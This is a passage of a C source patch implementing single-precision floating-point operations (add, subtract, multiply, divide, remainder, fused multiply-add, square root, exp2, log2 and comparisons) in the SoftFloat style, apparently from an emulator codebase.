aSig, - expDiff, &aSig ); + bSig |= 0x40000000; + bBigger: + zSig = bSig - aSig; + zExp = bExp; + zSign ^= 1; + goto normalizeRoundAndPack; + aExpBigger: + if ( aExp == 0xFF ) { + if ( aSig ) return propagateFloat32NaN( a, b STATUS_VAR ); + return a; + } + if ( bExp == 0 ) { + --expDiff; + } + else { + bSig |= 0x40000000; + } + shift32RightJamming( bSig, expDiff, &bSig ); + aSig |= 0x40000000; + aBigger: + zSig = aSig - bSig; + zExp = aExp; + normalizeRoundAndPack: + --zExp; + return normalizeRoundAndPackFloat32( zSign, zExp, zSig STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of adding the single-precision floating-point values `a' +| and `b'. 
The operation is performed according to the IEC/IEEE Standard for +| Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float32 float32_add( float32 a, float32 b STATUS_PARAM ) +{ + flag aSign, bSign; + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + + aSign = extractFloat32Sign( a ); + bSign = extractFloat32Sign( b ); + if ( aSign == bSign ) { + return addFloat32Sigs( a, b, aSign STATUS_VAR); + } + else { + return subFloat32Sigs( a, b, aSign STATUS_VAR ); + } + +} + +/*---------------------------------------------------------------------------- +| Returns the result of subtracting the single-precision floating-point values +| `a' and `b'. The operation is performed according to the IEC/IEEE Standard +| for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float32 float32_sub( float32 a, float32 b STATUS_PARAM ) +{ + flag aSign, bSign; + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + + aSign = extractFloat32Sign( a ); + bSign = extractFloat32Sign( b ); + if ( aSign == bSign ) { + return subFloat32Sigs( a, b, aSign STATUS_VAR ); + } + else { + return addFloat32Sigs( a, b, aSign STATUS_VAR ); + } + +} + +/*---------------------------------------------------------------------------- +| Returns the result of multiplying the single-precision floating-point values +| `a' and `b'. The operation is performed according to the IEC/IEEE Standard +| for Binary Floating-Point Arithmetic. 
+*----------------------------------------------------------------------------*/ + +float32 float32_mul( float32 a, float32 b STATUS_PARAM ) +{ + flag aSign, bSign, zSign; + int_fast16_t aExp, bExp, zExp; + uint32_t aSig, bSig; + uint64_t zSig64; + uint32_t zSig; + + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + bSig = extractFloat32Frac( b ); + bExp = extractFloat32Exp( b ); + bSign = extractFloat32Sign( b ); + zSign = aSign ^ bSign; + if ( aExp == 0xFF ) { + if ( aSig || ( ( bExp == 0xFF ) && bSig ) ) { + return propagateFloat32NaN( a, b STATUS_VAR ); + } + if ( ( bExp | bSig ) == 0 ) { + float_raise( float_flag_invalid STATUS_VAR); + return float32_default_nan; + } + return packFloat32( zSign, 0xFF, 0 ); + } + if ( bExp == 0xFF ) { + if ( bSig ) return propagateFloat32NaN( a, b STATUS_VAR ); + if ( ( aExp | aSig ) == 0 ) { + float_raise( float_flag_invalid STATUS_VAR); + return float32_default_nan; + } + return packFloat32( zSign, 0xFF, 0 ); + } + if ( aExp == 0 ) { + if ( aSig == 0 ) return packFloat32( zSign, 0, 0 ); + normalizeFloat32Subnormal( aSig, &aExp, &aSig ); + } + if ( bExp == 0 ) { + if ( bSig == 0 ) return packFloat32( zSign, 0, 0 ); + normalizeFloat32Subnormal( bSig, &bExp, &bSig ); + } + zExp = aExp + bExp - 0x7F; + aSig = ( aSig | 0x00800000 )<<7; + bSig = ( bSig | 0x00800000 )<<8; + shift64RightJamming( ( (uint64_t) aSig ) * bSig, 32, &zSig64 ); + zSig = (uint32_t)zSig64; + if ( 0 <= (int32_t) ( zSig<<1 ) ) { + zSig <<= 1; + --zExp; + } + return roundAndPackFloat32( zSign, zExp, zSig STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of dividing the single-precision floating-point value `a' +| by the corresponding value `b'. 
The operation is performed according to the +| IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float32 float32_div( float32 a, float32 b STATUS_PARAM ) +{ + flag aSign, bSign, zSign; + int_fast16_t aExp, bExp, zExp; + uint32_t aSig, bSig, zSig; + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + bSig = extractFloat32Frac( b ); + bExp = extractFloat32Exp( b ); + bSign = extractFloat32Sign( b ); + zSign = aSign ^ bSign; + if ( aExp == 0xFF ) { + if ( aSig ) return propagateFloat32NaN( a, b STATUS_VAR ); + if ( bExp == 0xFF ) { + if ( bSig ) return propagateFloat32NaN( a, b STATUS_VAR ); + float_raise( float_flag_invalid STATUS_VAR); + return float32_default_nan; + } + return packFloat32( zSign, 0xFF, 0 ); + } + if ( bExp == 0xFF ) { + if ( bSig ) return propagateFloat32NaN( a, b STATUS_VAR ); + return packFloat32( zSign, 0, 0 ); + } + if ( bExp == 0 ) { + if ( bSig == 0 ) { + if ( ( aExp | aSig ) == 0 ) { + float_raise( float_flag_invalid STATUS_VAR); + return float32_default_nan; + } + float_raise( float_flag_divbyzero STATUS_VAR); + return packFloat32( zSign, 0xFF, 0 ); + } + normalizeFloat32Subnormal( bSig, &bExp, &bSig ); + } + if ( aExp == 0 ) { + if ( aSig == 0 ) return packFloat32( zSign, 0, 0 ); + normalizeFloat32Subnormal( aSig, &aExp, &aSig ); + } + zExp = aExp - bExp + 0x7D; + aSig = ( aSig | 0x00800000 )<<7; + bSig = ( bSig | 0x00800000 )<<8; + if ( bSig <= ( aSig + aSig ) ) { + aSig >>= 1; + ++zExp; + } + zSig = ( ( (uint64_t) aSig )<<32 ) / bSig; + if ( ( zSig & 0x3F ) == 0 ) { + zSig |= ( (uint64_t) bSig * zSig != ( (uint64_t) aSig )<<32 ); + } + return roundAndPackFloat32( zSign, zExp, zSig STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the 
remainder of the single-precision floating-point value `a' +| with respect to the corresponding value `b'. The operation is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float32 float32_rem( float32 a, float32 b STATUS_PARAM ) +{ + flag aSign, zSign; + int_fast16_t aExp, bExp, expDiff; + uint32_t aSig, bSig; + uint32_t q; + uint64_t aSig64, bSig64, q64; + uint32_t alternateASig; + int32_t sigMean; + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + bSig = extractFloat32Frac( b ); + bExp = extractFloat32Exp( b ); + if ( aExp == 0xFF ) { + if ( aSig || ( ( bExp == 0xFF ) && bSig ) ) { + return propagateFloat32NaN( a, b STATUS_VAR ); + } + float_raise( float_flag_invalid STATUS_VAR); + return float32_default_nan; + } + if ( bExp == 0xFF ) { + if ( bSig ) return propagateFloat32NaN( a, b STATUS_VAR ); + return a; + } + if ( bExp == 0 ) { + if ( bSig == 0 ) { + float_raise( float_flag_invalid STATUS_VAR); + return float32_default_nan; + } + normalizeFloat32Subnormal( bSig, &bExp, &bSig ); + } + if ( aExp == 0 ) { + if ( aSig == 0 ) return a; + normalizeFloat32Subnormal( aSig, &aExp, &aSig ); + } + expDiff = aExp - bExp; + aSig |= 0x00800000; + bSig |= 0x00800000; + if ( expDiff < 32 ) { + aSig <<= 8; + bSig <<= 8; + if ( expDiff < 0 ) { + if ( expDiff < -1 ) return a; + aSig >>= 1; + } + q = ( bSig <= aSig ); + if ( q ) aSig -= bSig; + if ( 0 < expDiff ) { + q = ( ( (uint64_t) aSig )<<32 ) / bSig; + q >>= 32 - expDiff; + bSig >>= 2; + aSig = ( ( aSig>>1 )<<( expDiff - 1 ) ) - bSig * q; + } + else { + aSig >>= 2; + bSig >>= 2; + } + } + else { + if ( bSig <= aSig ) aSig -= bSig; + aSig64 = ( (uint64_t) aSig )<<40; + bSig64 = ( (uint64_t) bSig )<<40; + expDiff -= 64; + while ( 0 < expDiff ) { + 
q64 = estimateDiv128To64( aSig64, 0, bSig64 ); + q64 = ( 2 < q64 ) ? q64 - 2 : 0; + aSig64 = 0- ( ( bSig * q64 )<<38 ); + expDiff -= 62; + } + expDiff += 64; + q64 = estimateDiv128To64( aSig64, 0, bSig64 ); + q64 = ( 2 < q64 ) ? q64 - 2 : 0; + q = (uint32_t)(q64>>( 64 - expDiff )); + bSig <<= 6; + aSig = ( ( aSig64>>33 )<<( expDiff - 1 ) ) - bSig * q; + } + do { + alternateASig = aSig; + ++q; + aSig -= bSig; + } while ( 0 <= (int32_t) aSig ); + sigMean = aSig + alternateASig; + if ( ( sigMean < 0 ) || ( ( sigMean == 0 ) && ( q & 1 ) ) ) { + aSig = alternateASig; + } + zSign = ( (int32_t) aSig < 0 ); + if ( zSign ) aSig = 0- aSig; + return normalizeRoundAndPackFloat32( aSign ^ zSign, bExp, aSig STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of multiplying the single-precision floating-point values +| `a' and `b' then adding 'c', with no intermediate rounding step after the +| multiplication. The operation is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic 754-2008. +| The flags argument allows the caller to select negation of the +| addend, the intermediate product, or the final result. (The difference +| between this and having the caller do a separate negation is that negating +| externally will flip the sign bit on NaNs.) 
*----------------------------------------------------------------------------*/

float32 float32_muladd(float32 a, float32 b, float32 c, int flags STATUS_PARAM)
{
    flag aSign, bSign, cSign, zSign;
    int_fast16_t aExp, bExp, cExp, pExp, zExp, expDiff;
    uint32_t aSig, bSig, cSig;
    flag pInf, pZero, pSign;
    uint64_t pSig64, cSig64, zSig64;
    uint32_t pSig;
    int shiftcount;
    flag signflip, infzero;

    a = float32_squash_input_denormal(a STATUS_VAR);
    b = float32_squash_input_denormal(b STATUS_VAR);
    c = float32_squash_input_denormal(c STATUS_VAR);
    aSig = extractFloat32Frac(a);
    aExp = extractFloat32Exp(a);
    aSign = extractFloat32Sign(a);
    bSig = extractFloat32Frac(b);
    bExp = extractFloat32Exp(b);
    bSign = extractFloat32Sign(b);
    cSig = extractFloat32Frac(c);
    cExp = extractFloat32Exp(c);
    cSign = extractFloat32Sign(c);

    /* Detect (0 * Inf) / (Inf * 0) in the product, which is invalid.  */
    infzero = ((aExp == 0 && aSig == 0 && bExp == 0xff && bSig == 0) ||
               (aExp == 0xff && aSig == 0 && bExp == 0 && bSig == 0));

    /* It is implementation-defined whether the cases of (0,inf,qnan)
     * and (inf,0,qnan) raise InvalidOperation or not (and what QNaN
     * they return if they do), so we have to hand this information
     * off to the target-specific pick-a-NaN routine.
     */
    if (((aExp == 0xff) && aSig) ||
        ((bExp == 0xff) && bSig) ||
        ((cExp == 0xff) && cSig)) {
        return propagateFloat32MulAddNaN(a, b, c, infzero STATUS_VAR);
    }

    if (infzero) {
        float_raise(float_flag_invalid STATUS_VAR);
        return float32_default_nan;
    }

    if (flags & float_muladd_negate_c) {
        cSign ^= 1;
    }

    signflip = (flags & float_muladd_negate_result) ? 1 : 0;

    /* Work out the sign and type of the product */
    pSign = aSign ^ bSign;
    if (flags & float_muladd_negate_product) {
        pSign ^= 1;
    }
    pInf = (aExp == 0xff) || (bExp == 0xff);
    pZero = ((aExp | aSig) == 0) || ((bExp | bSig) == 0);

    if (cExp == 0xff) {
        if (pInf && (pSign ^ cSign)) {
            /* addition of opposite-signed infinities => InvalidOperation */
            float_raise(float_flag_invalid STATUS_VAR);
            return float32_default_nan;
        }
        /* Otherwise generate an infinity of the same sign */
        return packFloat32(cSign ^ signflip, 0xff, 0);
    }

    if (pInf) {
        return packFloat32(pSign ^ signflip, 0xff, 0);
    }

    if (pZero) {
        if (cExp == 0) {
            if (cSig == 0) {
                /* Adding two exact zeroes: sign follows the rounding mode
                 * when the zeroes disagree.  */
                if (pSign == cSign) {
                    zSign = pSign;
                } else if (STATUS(float_rounding_mode) == float_round_down) {
                    zSign = 1;
                } else {
                    zSign = 0;
                }
                return packFloat32(zSign ^ signflip, 0, 0);
            }
            /* Exact zero plus a denorm */
            if (STATUS(flush_to_zero)) {
                float_raise(float_flag_output_denormal STATUS_VAR);
                return packFloat32(cSign ^ signflip, 0, 0);
            }
        }
        /* Zero plus something non-zero : just return the something */
        if (flags & float_muladd_halve_result) {
            if (cExp == 0) {
                normalizeFloat32Subnormal(cSig, &cExp, &cSig);
            }
            /* Subtract one to halve, and one again because roundAndPackFloat32
             * wants one less than the true exponent.
             */
            cExp -= 2;
            cSig = (cSig | 0x00800000) << 7;
            return roundAndPackFloat32(cSign ^ signflip, cExp, cSig STATUS_VAR);
        }
        return packFloat32(cSign ^ signflip, cExp, cSig);
    }

    if (aExp == 0) {
        normalizeFloat32Subnormal(aSig, &aExp, &aSig);
    }
    if (bExp == 0) {
        normalizeFloat32Subnormal(bSig, &bExp, &bSig);
    }

    /* Calculate the actual result a * b + c */

    /* Multiply first; this is easy. */
    /* NB: we subtract 0x7e where float32_mul() subtracts 0x7f
     * because we want the true exponent, not the "one-less-than"
     * flavour that roundAndPackFloat32() takes.
     */
    pExp = aExp + bExp - 0x7e;
    aSig = (aSig | 0x00800000) << 7;
    bSig = (bSig | 0x00800000) << 8;
    pSig64 = (uint64_t)aSig * bSig;
    if ((int64_t)(pSig64 << 1) >= 0) {
        pSig64 <<= 1;
        pExp--;
    }

    zSign = pSign ^ signflip;

    /* Now pSig64 is the significand of the multiply, with the explicit bit in
     * position 62.
     */
    if (cExp == 0) {
        if (!cSig) {
            /* Throw out the special case of c being an exact zero now */
            shift64RightJamming(pSig64, 32, &pSig64);
            pSig = (uint32_t)pSig64;
            if (flags & float_muladd_halve_result) {
                pExp--;
            }
            return roundAndPackFloat32(zSign, pExp - 1,
                                       pSig STATUS_VAR);
        }
        normalizeFloat32Subnormal(cSig, &cExp, &cSig);
    }

    /* Align c's significand to the same position (explicit bit at 62).  */
    cSig64 = (uint64_t)cSig << (62 - 23);
    cSig64 |= LIT64(0x4000000000000000);
    expDiff = pExp - cExp;

    if (pSign == cSign) {
        /* Addition */
        if (expDiff > 0) {
            /* scale c to match p */
            shift64RightJamming(cSig64, expDiff, &cSig64);
            zExp = pExp;
        } else if (expDiff < 0) {
            /* scale p to match c */
            shift64RightJamming(pSig64, -expDiff, &pSig64);
            zExp = cExp;
        } else {
            /* no scaling needed */
            zExp = cExp;
        }
        /* Add significands and make sure explicit bit ends up in posn 62 */
        zSig64 = pSig64 + cSig64;
        if ((int64_t)zSig64 < 0) {
            shift64RightJamming(zSig64, 1, &zSig64);
        } else {
            zExp--;
        }
    } else {
        /* Subtraction */
        if (expDiff > 0) {
            shift64RightJamming(cSig64, expDiff, &cSig64);
            zSig64 = pSig64 - cSig64;
            zExp = pExp;
        } else if (expDiff < 0) {
            shift64RightJamming(pSig64, -expDiff, &pSig64);
            zSig64 = cSig64 - pSig64;
            zExp = cExp;
            zSign ^= 1;
        } else {
            zExp = pExp;
            if (cSig64 < pSig64) {
                zSig64 = pSig64 - cSig64;
            } else if (pSig64 < cSig64) {
                zSig64 = cSig64 - pSig64;
                zSign ^= 1;
            } else {
                /* Exact zero */
                zSign = signflip;
                if (STATUS(float_rounding_mode) == float_round_down) {
                    zSign ^= 1;
                }
                return packFloat32(zSign, 0, 0);
            }
        }
        --zExp;
        /* Normalize to put the explicit bit back into bit 62.
         */
        shiftcount = countLeadingZeros64(zSig64) - 1;
        zSig64 <<= shiftcount;
        zExp -= shiftcount;
    }
    if (flags & float_muladd_halve_result) {
        zExp--;
    }

    shift64RightJamming(zSig64, 32, &zSig64);
    return roundAndPackFloat32(zSign, zExp, (uint32_t)zSig64 STATUS_VAR);
}


/*----------------------------------------------------------------------------
| Returns the square root of the single-precision floating-point value `a'.
| The operation is performed according to the IEC/IEEE Standard for Binary
| Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

float32 float32_sqrt( float32 a STATUS_PARAM )
{
    flag aSign;
    int_fast16_t aExp, zExp;
    uint32_t aSig, zSig;
    uint64_t rem, term;
    a = float32_squash_input_denormal(a STATUS_VAR);

    aSig = extractFloat32Frac( a );
    aExp = extractFloat32Exp( a );
    aSign = extractFloat32Sign( a );
    /* NaN propagates; sqrt(+Inf) == +Inf; sqrt(-Inf) is invalid.  */
    if ( aExp == 0xFF ) {
        if ( aSig ) return propagateFloat32NaN( a, float32_zero STATUS_VAR );
        if ( ! aSign ) return a;
        float_raise( float_flag_invalid STATUS_VAR);
        return float32_default_nan;
    }
    /* sqrt of a negative (other than -0) is invalid; sqrt(-0) == -0.  */
    if ( aSign ) {
        if ( ( aExp | aSig ) == 0 ) return a;
        float_raise( float_flag_invalid STATUS_VAR);
        return float32_default_nan;
    }
    if ( aExp == 0 ) {
        if ( aSig == 0 ) return float32_zero;
        normalizeFloat32Subnormal( aSig, &aExp, &aSig );
    }
    zExp = ( ( aExp - 0x7F )>>1 ) + 0x7E;
    aSig = ( aSig | 0x00800000 )<<8;
    zSig = estimateSqrt32( aExp, aSig ) + 2;
    /* If the estimate is near a rounding boundary, refine it exactly.  */
    if ( ( zSig & 0x7F ) <= 5 ) {
        if ( zSig < 2 ) {
            zSig = 0x7FFFFFFF;
            goto roundAndPack;
        }
        aSig >>= aExp & 1;
        term = ( (uint64_t) zSig ) * zSig;
        rem = ( ( (uint64_t) aSig )<<32 ) - term;
        while ( (int64_t) rem < 0 ) {
            --zSig;
            rem += ( ( (uint64_t) zSig )<<1 ) | 1;
        }
        /* Keep a sticky bit so rounding sees any inexactness.  */
        zSig |= ( rem != 0 );
    }
    shift32RightJamming( zSig, 1, &zSig );
 roundAndPack:
    return roundAndPackFloat32( 0, zExp, zSig STATUS_VAR );

}

/*----------------------------------------------------------------------------
| Returns the binary exponential of the single-precision floating-point value
| `a'. The operation is performed according to the IEC/IEEE Standard for
| Binary Floating-Point Arithmetic.
|
| Uses the following identities:
|
| 1. -------------------------------------------------------------------------
|      x    x*ln(2)
|     2  = e
|
| 2. -------------------------------------------------------------------------
|                     2     3     4     5           n
|      x        x    x     x     x     x           x
|     e  = 1 + --- + --- + --- + --- + --- + ... + --- + ...
|               1!    2!    3!    4!    5!          n!
*----------------------------------------------------------------------------*/

/* Taylor-series coefficients 1/n! for n = 1..15, as float64 constants.  */
static const float64 float32_exp2_coefficients[15] =
{
    const_float64( 0x3ff0000000000000ll ), /*  1 */
    const_float64( 0x3fe0000000000000ll ), /*  2 */
    const_float64( 0x3fc5555555555555ll ), /*  3 */
    const_float64( 0x3fa5555555555555ll ), /*  4 */
    const_float64( 0x3f81111111111111ll ), /*  5 */
    const_float64( 0x3f56c16c16c16c17ll ), /*  6 */
    const_float64( 0x3f2a01a01a01a01all ), /*  7 */
    const_float64( 0x3efa01a01a01a01all ), /*  8 */
    const_float64( 0x3ec71de3a556c734ll ), /*  9 */
    const_float64( 0x3e927e4fb7789f5cll ), /* 10 */
    const_float64( 0x3e5ae64567f544e4ll ), /* 11 */
    const_float64( 0x3e21eed8eff8d898ll ), /* 12 */
    const_float64( 0x3de6124613a86d09ll ), /* 13 */
    const_float64( 0x3da93974a8c07c9dll ), /* 14 */
    const_float64( 0x3d6ae7f3e733b81fll ), /* 15 */
};

float32 float32_exp2( float32 a STATUS_PARAM )
{
    flag aSign;
    int_fast16_t aExp;
    uint32_t aSig;
    float64 r, x, xn;
    int i;
    a = float32_squash_input_denormal(a STATUS_VAR);

    aSig = extractFloat32Frac( a );
    aExp = extractFloat32Exp( a );
    aSign = extractFloat32Sign( a );

    /* NaN propagates; 2^-Inf == 0, 2^+Inf == +Inf.  */
    if ( aExp == 0xFF) {
        if ( aSig ) return propagateFloat32NaN( a, float32_zero STATUS_VAR );
        return (aSign) ? float32_zero : a;
    }
    /* 2^(+/-0) == 1 exactly.  */
    if (aExp == 0) {
        if (aSig == 0) return float32_one;
    }

    /* Any other input gives an inexact result.  */
    float_raise( float_flag_inexact STATUS_VAR);

    /* ******************************* */
    /* using float64 for approximation */
    /* ******************************* */
    x = float32_to_float64(a STATUS_VAR);
    x = float64_mul(x, float64_ln2 STATUS_VAR);   /* 2^a = e^(a*ln2) */

    xn = x;
    r = float64_one;
    for (i = 0 ; i < 15 ; i++) {
        float64 f;

        f = float64_mul(xn, float32_exp2_coefficients[i] STATUS_VAR);
        r = float64_add(r, f STATUS_VAR);

        xn = float64_mul(xn, x STATUS_VAR);
    }

    return float64_to_float32(r, status);
}

/*----------------------------------------------------------------------------
| Returns the binary log of the single-precision floating-point value `a'.
| The operation is performed according to the IEC/IEEE Standard for Binary
| Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/
float32 float32_log2( float32 a STATUS_PARAM )
{
    flag aSign, zSign;
    int_fast16_t aExp;
    uint32_t aSig, zSig, i;

    a = float32_squash_input_denormal(a STATUS_VAR);
    aSig = extractFloat32Frac( a );
    aExp = extractFloat32Exp( a );
    aSign = extractFloat32Sign( a );

    /* log2(+/-0) == -Inf; denormals are normalized first.  */
    if ( aExp == 0 ) {
        if ( aSig == 0 ) return packFloat32( 1, 0xFF, 0 );
        normalizeFloat32Subnormal( aSig, &aExp, &aSig );
    }
    /* log2 of a negative value is invalid.  */
    if ( aSign ) {
        float_raise( float_flag_invalid STATUS_VAR);
        return float32_default_nan;
    }
    /* NaN propagates; log2(+Inf) == +Inf.  */
    if ( aExp == 0xFF ) {
        if ( aSig ) return propagateFloat32NaN( a, float32_zero STATUS_VAR );
        return a;
    }

    aExp -= 0x7F;
    aSig |= 0x00800000;
    zSign = aExp < 0;
    /* Integer part of the log is just the unbiased exponent; the loop
     * below generates the fraction bits one at a time by repeatedly
     * squaring the significand.  */
    zSig = aExp << 23;

    for (i = 1 << 22; i > 0; i >>= 1) {
        aSig = ( (uint64_t)aSig * aSig ) >> 23;
        if ( aSig & 0x01000000 ) {
            aSig >>= 1;
            zSig |= i;
        }
    }

    if ( zSign )
        zSig = 0-zSig;

    return normalizeRoundAndPackFloat32( zSign, 0x85, zSig STATUS_VAR );
}

/*----------------------------------------------------------------------------
| Returns 1 if
the single-precision floating-point value `a' is equal to +| the corresponding value `b', and 0 otherwise. The invalid exception is +| raised if either operand is a NaN. Otherwise, the comparison is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float32_eq( float32 a, float32 b STATUS_PARAM ) +{ + uint32_t av, bv; + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) + || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 0; + } + av = float32_val(a); + bv = float32_val(b); + return ( av == bv ) || ( (uint32_t) ( ( av | bv )<<1 ) == 0 ); +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the single-precision floating-point value `a' is less than +| or equal to the corresponding value `b', and 0 otherwise. The invalid +| exception is raised if either operand is a NaN. The comparison is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. 
+*----------------------------------------------------------------------------*/ + +int float32_le( float32 a, float32 b STATUS_PARAM ) +{ + flag aSign, bSign; + uint32_t av, bv; + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) + || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 0; + } + aSign = extractFloat32Sign( a ); + bSign = extractFloat32Sign( b ); + av = float32_val(a); + bv = float32_val(b); + if ( aSign != bSign ) return aSign || ( (uint32_t) ( ( av | bv )<<1 ) == 0 ); + return ( av == bv ) || ( aSign ^ ( av < bv ) ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the single-precision floating-point value `a' is less than +| the corresponding value `b', and 0 otherwise. The invalid exception is +| raised if either operand is a NaN. The comparison is performed according +| to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. 
+*----------------------------------------------------------------------------*/ + +int float32_lt( float32 a, float32 b STATUS_PARAM ) +{ + flag aSign, bSign; + uint32_t av, bv; + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) + || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 0; + } + aSign = extractFloat32Sign( a ); + bSign = extractFloat32Sign( b ); + av = float32_val(a); + bv = float32_val(b); + if ( aSign != bSign ) return aSign && ( (uint32_t) ( ( av | bv )<<1 ) != 0 ); + return ( av != bv ) && ( aSign ^ ( av < bv ) ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the single-precision floating-point values `a' and `b' cannot +| be compared, and 0 otherwise. The invalid exception is raised if either +| operand is a NaN. The comparison is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float32_unordered( float32 a, float32 b STATUS_PARAM ) +{ + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) + || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 1; + } + return 0; +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the single-precision floating-point value `a' is equal to +| the corresponding value `b', and 0 otherwise. Quiet NaNs do not cause an +| exception. The comparison is performed according to the IEC/IEEE Standard +| for Binary Floating-Point Arithmetic. 
+*----------------------------------------------------------------------------*/ + +int float32_eq_quiet( float32 a, float32 b STATUS_PARAM ) +{ + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) + || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) + ) { + if ( float32_is_signaling_nan( a ) || float32_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 0; + } + return ( float32_val(a) == float32_val(b) ) || + ( (uint32_t) ( ( float32_val(a) | float32_val(b) )<<1 ) == 0 ); +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the single-precision floating-point value `a' is less than or +| equal to the corresponding value `b', and 0 otherwise. Quiet NaNs do not +| cause an exception. Otherwise, the comparison is performed according to the +| IEC/IEEE Standard for Binary Floating-Point Arithmetic. 
+*----------------------------------------------------------------------------*/ + +int float32_le_quiet( float32 a, float32 b STATUS_PARAM ) +{ + flag aSign, bSign; + uint32_t av, bv; + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) + || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) + ) { + if ( float32_is_signaling_nan( a ) || float32_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 0; + } + aSign = extractFloat32Sign( a ); + bSign = extractFloat32Sign( b ); + av = float32_val(a); + bv = float32_val(b); + if ( aSign != bSign ) return aSign || ( (uint32_t) ( ( av | bv )<<1 ) == 0 ); + return ( av == bv ) || ( aSign ^ ( av < bv ) ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the single-precision floating-point value `a' is less than +| the corresponding value `b', and 0 otherwise. Quiet NaNs do not cause an +| exception. Otherwise, the comparison is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic. 
+*----------------------------------------------------------------------------*/ + +int float32_lt_quiet( float32 a, float32 b STATUS_PARAM ) +{ + flag aSign, bSign; + uint32_t av, bv; + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) + || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) + ) { + if ( float32_is_signaling_nan( a ) || float32_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 0; + } + aSign = extractFloat32Sign( a ); + bSign = extractFloat32Sign( b ); + av = float32_val(a); + bv = float32_val(b); + if ( aSign != bSign ) return aSign && ( (uint32_t) ( ( av | bv )<<1 ) != 0 ); + return ( av != bv ) && ( aSign ^ ( av < bv ) ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the single-precision floating-point values `a' and `b' cannot +| be compared, and 0 otherwise. Quiet NaNs do not cause an exception. The +| comparison is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float32_unordered_quiet( float32 a, float32 b STATUS_PARAM ) +{ + a = float32_squash_input_denormal(a STATUS_VAR); + b = float32_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) + || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) + ) { + if ( float32_is_signaling_nan( a ) || float32_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 1; + } + return 0; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting 